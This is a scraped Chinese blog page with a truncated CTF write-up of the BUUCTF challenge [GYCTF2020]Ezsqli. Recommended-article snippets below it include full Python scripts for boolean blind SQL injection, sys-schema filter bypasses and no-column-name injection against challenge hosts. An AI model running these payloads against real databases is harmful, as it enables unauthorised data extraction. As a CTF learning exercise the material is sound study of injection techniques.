[GYCTF2020]Ezsqli

最新推荐文章于 2025-01-19 14:22:37 发布
原创 最新推荐文章于 2025-01-19 14:22:37 发布 · 366 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#buu

本文探讨了在面临信息_schema过滤和无列名注入限制时,如何通过ASCII字符比较和构造巧妙payload,绕过SQL检查,实现数据获取。作者分享了两种方法,并展示了如何利用ASCII顺序和位操作进行有效渗透。

在这里插入图片描述

1  Nu1L
2  V&N
3  Error Occured When Fetch Result.
2-1  Nu1L
1 or 2  SQL Injection Checked.

Fuzz一下,507就是被过滤了的

在这里插入图片描述
在这里插入图片描述
翻翻以前的笔记,之前记过information_schema被过滤了和无列名注入的一些方法

----------------information_schema过滤与无列名注入----------

1^(ascii(substr((select group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()),1,1))=117)^1

利用sys.schema_table_statistics_with_buffer这个拿到表名,但是拿不到列名,所以考虑无列名注入

import requests
import time

url = 'http://f638604e-e401-41e9-8510-ef431e97daf2.nod
最低0.47元/天 解锁文章
[GYCTF2020]Ezsqli1
alwtj的博客
06-11 513
这段代码,sys.schema_table_statistics_with_buffer 替代了我们平常使用的information,因为information被过滤了~不过这段代码,也带了一些猜测,猜测他就只有1行,切第一个字段为id,并且value=1。不过获取flag的时候我是猜测那张表的column存在一个flag字段~是字符型,再看看输入1 0 0 / 1 0 0。但是也可以换一种编程去获取flag,内容如下~是个无回显,而且没有过滤空格,那就用盲注~情理之中,不过又可以用到新的姿势了~
[GYCTF2020] Ezsqli
qq_40327508的博客
11-21 673
考点: 盲注 + 无列名注入 使用异或注入发现页面回显不一样 进一步判断 接下来开始获取列名,但是因为or被过滤使用sys.x$schema_flattened_keys绕过 使用脚本获取表名 import requests url = "http://9c35ab79-5056-4de1-87fe-0418ebc00b82.node3.buuoj.cn/index.php" flag = "" payload = "1^(ascii(substr((select group_concat(tab
BUU[GYCTF2020]Ezsqli1
weixin_46245411的博客
07-19 801
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 知识点 一、布尔盲注 二、无列名注入 1.知识点 2.实现方式 总结 知识点 布尔盲注以及无列名注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、布尔盲注 在提交部分输入值上传,抓包查看 修改POST传参id的部分值为其他值后 这里就判断出大致使用BOOL盲注来注入 简单的写一段万能SQL语句后 下一步使用字典去fuzz一下,查看有哪些关键词被...
2025.1.18——七、[GYCTF2020]Ezsqli 1
2402_87387800的博客
01-19 1814
题目来源:buuctf[GYCTF2020]Ezsqli1
[GYCTF2020]Ezsqli(无列名注入)
weixin_43940853的博客
05-16 6065
[GYCTF2020]Ezsqli 过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了 当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键 接下来就可以写脚本判断表名了 import requests url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' payload = '2||ascii(substr((select group_concat
攻防世界题目名称-ezsqli
最新发布
10-12
攻防世界中名为 ezsqli 的题目相关信息如下: - **[BUUCTF WEB Ezsqli]**:这是一道 SQL 注入题,打开场景有一个查询框。经查询,1、2 是两条有效数字,0 和其他的都是非法输入,1+1 成功回显 2。该题是布尔型回显,异或符未被过滤,布尔类型常用的 substr、ascii 函数也未被禁用,可进行数据库爆破。还给出了爆破数据库的 Python 脚本,通过二分法不断尝试字符的 ASCII 值来获取数据库名 [^1]。 ```python import requests import time if __name__ == '__main__': url = 'http://6c6f5e05-7691-4510-86f0-317b1201b01d.node4.buuoj.cn:81/index.php' payload1 = '(select database())' flag = '' for i in range(50): l = 0 r = 255 mid = (l + r) // 2 while (l < r): response = requests.post(url=url, data={"id": "0^(ascii(substr({},{},1))>{})".format(payload1, str(i + 1), str(mid))}) if 'Nu1L' in response.text: print("小了") l = mid + 1 else: print("大了") r = mid mid = (l + r) // 2 time.sleep(1) flag += chr(mid) print(flag) ``` - **[GYCTF2020]Ezsqli**:可利用上一题脚本的两个 payload 得到该题的数据库及表名。payload 还可写成 `^(ascii(substr((select(database())),%d,1))>%d)^1` 的形式。此外,该题涉及无列名注入的另一种方式(不需要 union,join)——ascii 位偏移,并给出了相应的 exp 脚本 [^2]。 ```python import requests url='http://9640761b-a0fc-457b-bf37-592af5e65e5c.node4.buuoj.cn:81/index.php' payload='2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))' flag='' for j in range(200): for i in range(32,128): hexchar=flag+chr(i) py=payload.format(hexchar) datas={'id':py} re=requests.post(url=url,data=datas) if 'Nu1L' in re.text: flag+=chr(i-1) print(flag) break ``` - **[ezsqli(GYCTF - WEB)]**:题目过滤了 or 和 union,无法使用 Information_Schema.Tables,之前常用的 innodb_table_stats 和 innodb_index_stats 也无法使用。可参考 Alternatives to Extract Tables and Columns from MySQL and MariaDB 文章用 sys 来查找表名,还给出了列名查找的脚本 [^3]。 ```python import requests import string url = "题目url" def exp1(): str1 = ('0123456789'+string.ascii_letters+string.punctuation).replace("'","").replace('"','').replace('\\','') flag = '' select = 'select group_concat(table_name) from sys.x$schema_flattened_keys' for j in range(1,40): for i in str1: paylaod = "1/**/&&/**/(select substr(({}),{},1))='{}'".format(select, j, i) #print(paylaod) data = { 'id': paylaod, } r = requests.post(url,data=data) if 'Nu1L' in r.text: flag += i print(flag) break if __name__ == '__main__': exp1() ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值